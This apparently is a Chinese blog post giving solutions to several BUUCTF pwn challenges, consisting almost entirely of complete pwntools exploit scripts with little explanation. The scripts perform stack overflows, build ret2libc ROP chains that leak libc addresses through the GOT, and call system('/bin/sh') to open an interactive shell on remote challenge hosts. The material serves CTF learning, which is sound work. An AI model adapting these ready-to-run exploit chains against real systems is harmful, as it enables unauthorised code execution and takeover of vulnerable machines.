【pwn学习】buuctf pwn题目(二)

下班了继续做

level0

先checksec一下




很简单的道理就是vulner函数里面存在漏洞call到callsystem就好了



就覆盖0x80个就好了

算了之后这种简单题就直接给payload吧

ciscn_2019_n_1

这道题看了源码是逆向加pwn
逆向完就很简单了
就直接ret2libc
因为是64所以需要找一下gadget
直接贴代码吧

#coding=utf8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.terminal = ['tmux','splitw','-h']
context.arch = 'amd64'

local = 0

if local:
    cn = process('./ciscn_2019_c_1')
    bin1 = ELF('./ciscn_2019_c_1',checksec=False)
else:
    cn = remote('node3.buuoj.cn', 29644)
    bin1 = ELF('./ciscn_2019_c_1')

def z(a=''):
    if local:
        gdb.attach(cn,a)
        if a == '':
            raw_input()

# z('b*0x0400AD6\nc')

pop_rdi = 0x00400c83 # pop rdi ; ret
main_addr = 0x0400B28
cn.sendline('1')
cn.recvuntil('encrypted\n')

payload = flat(
        'A'*0x50, 0 , pop_rdi, bin1.got['puts'],bin1.plt['puts'],main_addr
    )

cn.sendline(payload)
cn.recvuntil('O\n')
puts_addr = u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")

cn.sendline('1')
cn.recvuntil('encrypted\n')

payload = flat(
        'A'*0x50, 0 ,0x0400B27, pop_rdi, str_bin_sh,system_addr
    )

cn.sendline(payload)

cn.interactive()

babyrop

from pwn import *
from LibcSearcher import *
#context.log_level = 'debug'
#p=process("./babyrop")
p=remote('node3.buuoj.cn', 26990)


elf=ELF("./babyrop")

#gdb.attach(p)
payload="\x00\x00\x00\x00"+"a"*(0x2c-0x25-0x4)+"\xff"
p.sendline(payload)
p.recvuntil("Correct\n")


write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x08048825


payload="a"*0xE7+p32(0xdeadbeef)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)


p.sendline(payload)


write_addr=u32(p.recv(4))
print "write_addris "+hex(write_addr)


libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")


print "libc_base is "+hex(libc_base)
print "system_addr is "+hex(system_addr)
print "str_bin_sh is "+hex(str_bin_sh)


payload="\x00\x00\x00\x00"+"a"*(0x2c-0x25-0x4)+"\xff"
p.sendline(payload)
p.recvuntil("Correct\n")
payload="a"*0xE7+p32(0xdeadbeef)+p32(system_addr)+p32(main_addr)+p32(str_bin_sh)


p.sendline(payload)
p.interactive()

ciscn_2019_n_1


关键函数好像栈溢出覆盖成这个就好了
没试过小数



值就存储在这个位置所以只要盖成这个就好了


#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.terminal = ['tmux','splitw','-h']
context.arch = 'i386'

local = 1

if local:
    cn = process('./ciscn_2019_n_1')
    # bin = ELF('./task_shoppingCart',checksec=False)
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    # libc = ELF('/lib/i386-linux-gnu/libc.so.6',checksec=False)

else:
    cn = remote('node3.buuoj.cn', 27179)
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    pass


def z(a=''):
    if local:
        gdb.attach(cn,a)
        if a == '':
            raw_input()

z('b*0x04006A2')
# system_addr = 0x08048F0E
payload = flat('A'*(0x30-0x4),0x41348000)

cn.sendline(payload)
cn.interactive()

ciscn_2019_en_2

一样的payload

#coding=utf8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.terminal = ['tmux','splitw','-h']
context.arch = 'amd64'

local = 0

if local:
    cn = process('./ciscn_2019_c_1')
    bin1 = ELF('./ciscn_2019_c_1',checksec=False)
else:
    cn = remote('node3.buuoj.cn', 26666)
    bin1 = ELF('./ciscn_2019_en_2')

def z(a=''):
    if local:
        gdb.attach(cn,a)
        if a == '':
            raw_input()

# z('b*0x0400AD6\nc')

pop_rdi = 0x00400c83 # pop rdi ; ret
main_addr = 0x0400B28
cn.sendline('1')
cn.recvuntil('encrypted\n')

payload = flat(
        'A'*0x50, 0 , pop_rdi, bin1.got['puts'],bin1.plt['puts'],main_addr
    )

cn.sendline(payload)
cn.recvuntil('L \n')
puts_addr = u64(cn.recvuntil('\n')[:-1].ljust(8,'\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
system_addr=libc_base+libc.dump("system")
str_bin_sh=libc_base+libc.dump("str_bin_sh")

cn.sendline('1')
cn.recvuntil('encrypted\n')

payload = flat(
        'A'*0x50, 0 ,0x0400B27, pop_rdi, str_bin_sh,system_addr
    )

cn.sendline(payload)

cn.interactive()

你可能感兴趣的:(【pwn学习】buuctf pwn题目(二))